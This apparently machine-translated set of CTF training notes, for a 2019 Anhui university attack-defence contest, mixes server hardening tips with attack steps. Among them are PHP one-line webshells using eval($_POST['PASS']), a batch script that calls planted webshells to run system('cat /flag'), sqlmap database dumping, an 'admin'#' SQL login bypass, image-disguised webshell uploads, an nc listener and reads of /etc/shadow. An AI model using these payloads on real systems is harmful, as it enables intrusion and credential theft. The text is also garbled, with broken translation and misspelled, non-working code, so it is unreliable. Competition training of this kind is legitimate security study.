2019年安徽省大学生ネット攻防試合前トレーニング——Day 2
4879 ワード
AWD(高職グループ)試合構想(実験室楊旭先輩の記録に由来)トラフィック分析仮想マシン、トラフィックファイルをダウンロードしてデータ分析を行う(可能)* flag更新 flagが取られ、このチームは減点され、攻撃者の得点は だった.主催者はチームのサーバーをcheckし、減点した.得点は他のチームが 点を分けた.データベースパスワード データベース(database-con栖g.php) /etc/redis/redis.conf tomacat-user.xml webpass.
ユーザ、ディレクトリ、ポート、プロセス情報(権限付与)(ps,netstat-anptu,top,/etc/issue) サイトバックドア、webログ(get,)、agログ、history、(バックアップサイト) バックアップとリカバリ(ソースコードの削除) tar-czfディレクトリ ローカル へのバックアップ
wafの作成 データ洗浄とログ情報 を作成する.ファイルとプロセスモニタリング ファイルモニタリング(pythonスクリプト、栖lecmp、shutil、os) プロセスモニタ
サービスパスワードを変更し、サービス外部接続 を制約する現在のsshユーザホーム を同期する. seesionsファイル、tmpディレクトリ を定期的にクリーンアップサービス弱パスワード 主催者裏口 cmsバージョン番号を決定し、exploitを検索して を利用する一言木馬(ipを制限し、D盾に検出されないようにする) Linuxベース grep -nir “eval”/var/www/html ps -ef |grep httpd echo -e “\oldpasswdnewpasswdnewpasswd” | passwd ps -u apache -o user,pid contrab-r//自動化タスク の削除
共通スクリプト phpプログラムスクリプト wafロード/アンインストールプログラム(フィルタ) ファイルモニタ プロセスモニタ 一括攻撃スクリプト webshell管理システム macアドレスバインド 脆弱性(sql+ファイルアップロード+ファイル解析脆弱性) は権限(権利付与)を維持し、強化する.nc-lvvp 9999サーバの権限cp ファイルにはinclude(必要がなければ直接濾過) check_login($userはSqlクエリ文に直接接続され、フィルタは厳密ではありません) 越権 アップロードファイル(厳密、検証接尾辞、アップロードファイル機能削除) extract($_REQUEST); a(a(_post(‘b’))一言木馬(コード注入) 論理脆弱性:admin 111検証コードが正しい(検証コードが更新されず変化しない)post注入sqlmap-r sql.txt--dbs(爆庫) CFS総合ターゲット競技(学部組)試合ネットワークトポロジ
1層目のターゲットに攻め込んだ後、1層目のターゲットにエージェントとして2台目のターゲットに順次アクセスする
攻撃の構想. nmap走査nmap-a-sVip スキャンバックグラウンド 御剣 dirsearch(python dirsearch.py -u “URL” )
ログインインタフェース試行sql注入(万能パスワードadmin’#) webshellアップロード アップロードディレクトリ(スキャンされたバックグラウンドに注意) を探します伝画像馬1.jpg.php等 phpinfo()をテストします. 一言木馬
中国包丁でつなぐ flagの一般的なflagの位置を探します / /etc/passwd /etc/shadow grep “flag” -R/ Webサイトバックグラウンド http sshなどのプロファイル crontab データベース Webサイトのプロファイル:config.php デスクトップトラフィックパケット起動項目SAMパスワードファイルログファイル(windows) 権利付与スクリプトおよびプロキシスクリプトを収集する
import requests
for i in range():
ip = ???
try:
req = requests.get(url)
print(ip,req.text)
expect:
psss
eval(_$GET[PASS])
requests.get(url+?PASS=system("cat /flag"))
IP:172.24.10.x(255.255.255.0) 1
1:172.24.10.x(255.255.255.0)
2:172.24.11.x(255.255.255.0)
1:172.24.11.x(255.255.255.0)
2:172.24.12.x(255.255.255.0)
1:172.24.12.x(255.255.255.0)
1層目のターゲットに攻め込んだ後、1層目のターゲットにエージェントとして2台目のターゲットに順次アクセスする
攻撃の構想.
phpinfo(); eval($_POST["PASS"]) ;?>
中国包丁でつなぐ